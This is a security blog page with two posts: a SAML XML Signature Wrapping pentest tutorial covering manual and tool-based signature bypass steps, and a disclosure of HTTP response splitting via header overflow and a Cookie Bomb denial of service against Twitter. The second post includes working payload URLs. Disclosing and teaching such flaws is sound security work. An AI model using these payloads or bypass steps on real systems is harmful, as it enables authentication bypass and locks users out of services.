BEST DEAL

Showing posts with label HTTP. Show all posts
Showing posts with label HTTP. Show all posts

Wednesday, 14 December 2016

XML Signature(Basic to advance)

The XML Signature Standard

The XML Signature standard is an immensely complicated beast, designed by a working group involving all the big names, and intended to be a one-size-fits-all solution to building tamper-resistant XML documents. Unfortunately, as is often the case, one-size-fits-all becomes the-only-size-fits-nobody.
In a normal application of digital signatures, we take a document to be signed, run it through a cryptographic hash function, and then apply a digital signature algorithm to the hash. If the document received is exactly identical, the signature will validate, whereas if even a single bit changes, the signature becomes invalid and the document is rejected.
Unfortunately, XML Signatures have one killer feature - the standard allows us to sign part of the document instead of the whole document, and embed the signature within the same document it’s supposed to be validating - so called inline signatures. The signatures do this by containing a “Reference” to the part of the document they sign, usually by referring to the “ID” attribute of an XML element, but in theory allowing anything in the XPath standard to be used as an expression. I can, in theory, write a signature anywhere within a document that refers to the “third to last <foo> element”, or equally vague expressions.
When validating an XML signature it’s not enough to ask the question “is this a valid signature from this signer?”. We also have to ask “is this signature present, referring to the right part of the document, applying all the right canonicalizations, from the expected signer AND valid?”. All too often, at least one of these checks is not implemented.

Getting Started with SAML Raider

While all attacks described here can be carried out without many tools, SAML Raider1, a Burp proxy plugin, is a useful tool for testing the common cases.

Checks

As described above, signatures can appear in various places within the SAML message and cover various parts of the message. By keeping the content of the message but adding new parts and modifying the structure of the remaining parts, we can craft messages that are still technically signed correctly, but may be interpreted by SAML libraries as having crucial parts signed when they are not.
Whenever the Service Provider is supposed to check something, there’s an opportunity for them to fail to do so or do so incorrectly, giving us an opportunity to bypass the signature. Enable Burp’s interception, capture the SAML request, and try these transformations. Each one should be done against a fresh, valid log-in attempt, as there is usually a nonce preventing us from replaying the same request repeatedly.
For repeated attempts, you may benefit from intercepting a single endpoint only in Burp using interception options like this:

Is a Signature Required?

The SAML standard requires that all messages passed through insecure channels, such as the user’s browser, be signed. However, messages that pass through secure channels, such as an SSL/TLS back channel, do not have to be. As a result of this, we’ve seen SAML consumers that validate any signature present, however silently skip validation if the signature is removed. The software is essentially presuming that we’ve already checked that a message coming from an insecure channel is signed, when this isn’t the case.
The impact of this is the ability to simply remove signatures, and tamper with the response as if they weren’t there. SAML raider can test this one pretty easily:

Is the Signature Validated?

Validating XML signatures is extremely complicated, as the standard expects a series of transformation and canonicalization steps to be applied first (e.g. to ignore the amount of white space). The difficulty of this makes it extremely hard to validate signatures without a fully featured XML Signature library behind you. The impacts of this are:
  • Developers don’t generally understand the internals of signature validation.
  • Intermediate tools, such as web application firewalls, have no idea whether signatures are valid or not.
  • Libraries may have configurable options, such as lists of permitted canonicalization methods, which are meaningless to the developer.
The difficulty of implementing this standard, and the somewhat arcane nature of it, leads to the issues we will now look at.
First, testing whether the signature is validated at all is simple - change something in the supposedly signed content and see if it breaks.

Is the Signature From The Right Signer?

Another stumbling block is whether or not the receiver checks the identity of the signer. We haven’t seen this one done wrong, but SAML Raider will make this fairly easy to test.
Copy the certificate to SAML Raider’s certificate store:
Save and self-sign the certificate, so we have a self-signed copy of the same certificate:
Now we can re-sign the original request with our new certificate, either by signing the whole message or the assertion:
You could identify which of those two options is normally used by your recipient, or just try each of them.

Is the Correct Part of the Response Signed?

How XSW Attacks Work

The SAML standard allows signatures to appear in two places only:
  • A signature within a <Response> tag, signing the Response tag and its descendants.
  • A signature within an <Assertion> tag, signing the Assertion tag and its descendants.
The SAML standard is very specific about where signatures are allowed to be, and what they are allowed to refer to.
However, nobody implements XML signatures in all their gory complexity for use in SAML alone. The standard is generic, and so are the implementations and software libraries built for it. As a result, the separation of responsibilities looks like this:
  • The XML Signature library validates according to the XML Signature standard, which allows anything to be signed from anywhere.
  • The SAML library expects the XML Signature library to tell it whether or not the response is valid.
Somewhere in the middle of these two components, the rules about what we have to sign are often lost. As a result, we can often have our signature refer to a different part of the document, and still appear valid to the recipient.
By copying the signed parts of the document, and ensuring the signatures point to the copies, we can separate the part of the document that the XML Signature library checks from the part of the document that the SAML library consumes.

Automated XSW

SAML Raider will automate the most common attacks of this form for you:
Try selecting each of those options from the drop-down, clicking “Apply XSW” and sending the request on. If this doesn’t cause an error, try doing it again and changing the username or other user identifier in each place it appears in the SAML XML.

Limitations of SAML Raider

While SAML Raider will test the common cases, there are a few attacks that require a deeper understanding:
  • Producing a response that will validate against an XML schema (requires hiding the shadow copy inside an element that may contain xs:any).
  • Bypassing validation when both the Response, and Assertions within it are signed and checked.
  • Bypassing XML signatures in non-SAML contexts, for example SOAP endpoints using WS-Security extensions.

Manual XSW

If SAML Raider’s out-of-the-box options don’t work, you may want to try a manual approach:
  • Decode the Base64-encoded content to access the SAML Response XML.
  • Check that the signature’s <Reference> tag contains the ID of a signed element.
  • Copy the signed content somewhere else in the document (often the end of the <Response> is OK, if XML Schema validation is in play try finding somewhere to copy it that doesn’t break the schema.)
  • Remove the XML signature from the copy, leaving it in the original. This is necessary as the XML encapsulated signature standard removes the signature that is being validated. In the original document, this was the contained signature, so we have to cut it out from the copy.
  • Change the ID of the original signed element to something different (e.g. change a letter).
  • Change the content of the original assertion.
  • Re-encode as Base64, put in to the request and forward on.
If the signature validation points to the copy, it will ignore your changes. With practice, you can complete this process pretty quickly if strict time limits on requests are in play.

SAML Pentest Checklist

  • Does the SAML response pass through the web browser?
  • Is it signed? If not, try changing the content.
  • Is it accepted if we remove the signatures?
  • Is it accepted if we re-sign it with a different certificate?
  • Do any of the eight transforms baked in to SAML Raider produce a result that is accepted?
  • If you change such a response, is the modified response accepted?
  • Might one of SAML Raider’s limitations noted above apply? If so, you may neeed.\

please do comment below if you have any question.

Sunday, 11 December 2016

HTTP response splitting (advance part)

HTTP Response Splitting with Header Overflow

This issue clearly demonstrates how HTTP Response Splitting differs from CRLF injection. Normally 99 HTTP Response Splitting vulnerabilities are caused by CRLF injection, while this one abused a different flaw which did not involve injecting CR or LF.
It happened right after the last episode. Their monkey-patch approach finally paid off - inputs on the same page still lacked proper validations, which led to the discovery of this issue. When crafting a long enough value in one of the input parameters, the HTML source was directly shown.
What happened after crafting long enough input
This unusual scene was due to the missing Content-Type. In fact, half of the header fields that were supposed to be sent along the response were split in half. The server seemed to only handle the first 8kB of the response header, and then it sensed the response was probably incomplete or broken thus returned a HTTP 500 (Internal Server Error). The interesting thing is the truncated part got returned while reissuing the same request (let's call it second response). As we can control what value to be reflected in the response header, we can inject a string so that its length plus the preceding header fields' slightly exceeds 8kB, then suddenly the last copule of characters of our injected string becomes the beginning of the next response header.
Weird response splitting behavior
In this case, after injecting something like AAA[...]AAA:foobar in report_user_idAAA:foobar becomes a header field with name AAA and value foobar of the second response. Apparently we can replace it with a standardized header field (e.g. Access-Control-Request-Origin) to do real harms.
However, it was not easy to decide how many paddings should be added to fill up just 8k because sometimes the response header may vary. We need a deterministic way to have it truncated to wherever we want. A quick fuzzing reveals that the server consumes empty spaces (U+0020) in the header field name. In other words, we can use empty spaces as padding. So to sum up:
  1. Prepend a loads of empty spaces (slightly less than 8kB, otherwise server rejects the request with HTTP 414 (Request-URI Too Long)) to an header field for attack
  2. Put the crafted value into one of the input parameters
  3. Make victims visit the page twice, because only the second time actually triggers the payload
One final challenge was browsers encode empty space with %20. The problem is it costs 3 bytes instead of 1, and that makes our intended payload bloated (remember request URI needs to be less than 8kB as stated above). Luckily plus sign (+) is also accepted as encoded empty space.
To be honest I have no idea what the root cause of this was. This might be a buffer implementation bug, but I can't tell for sure. Anyway, this weird behavior was fixed but there's still no validation on inputs whatsoever.

Final attack payload

https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=+++[...]+++set-cookie:foobar
And the full response header:
HTTP/1.1 200 OK  
set-cookie: foobar  
x-response-time: 229  
x-connection-hash: 4f7c08fce85fe4801b3b24f05764fc84  
x-content-type-options: nosniff  
x-frame-options: SAMEORIGIN  
x-transaction: f9709a489ba395b5  
x-twitter-response-tags: BouncerCompliant  
x-xss-protection: 1; mode=block  

References


Denial of Service with Cookie Bomb

The above discovery was actually a byproduct of this one. Since the inputs are reflected in Set-Cookie, we can control the value of these particular cookies as well as their attributes (e.g DomainExpires). Previously this would mean a CSRF protection bypass (using comma (,) as cookie separator fwiw), but it's not the case anymore as Twitter now compares the token to the one in session. Still, attackers can exploit it with Cookie Bomb.
Cookie Bomb is a term introduced by Egor Homakov. The attack itself is nothing new but seldom people actually look into it. The main idea of it is that servers reject requests with an exceptionally large header. The exactly figure may vary on different servers but generally the request header can't be greater than 8kB. By abusing this feature, attackers can force victims into accepting a bunch of large cookies. What it does is that all requests to the corresponding website from victims will then contain a very large cookie, causing the server to reject any request from the victims (a.k.a. Denial of Service).
The attack can be further improved by manipulating different cookie attributes:
  • Domain: instead of just example.com.example.com will make cookies applied to all the sub-domains, paralyzing the entire services
  • Expires: by default a cookie will be destroyed after the browser restarts unless otherwise specified, conversely attackers can take advantage of it to lock victims out forever until they manually delete the cookies
  • Path: setting it to root path (/) can maximize the number of affected pages

Attack in Action

Attack payload (without encoding for readablility):
https://twitter.com/i/safety/report_story?next_view=report_story_start&reported_user_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com
Response header:
HTTP/1.1 200 OK  
[...]
set-cookie: reported_user_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com  
set-cookie: reported_tweet_id=000[...]000;Expires=Wed, 02 Apr 2025 12:21:55 GMT;Path=/;Domain=.twitter.com  
[...]
You may wonder why to use two cookies rather than just one. That's because one single cookie can only contain at most 4kB of data.
Attack in action
After victims visit the page, our bomb is silently planted. No more twitting for them.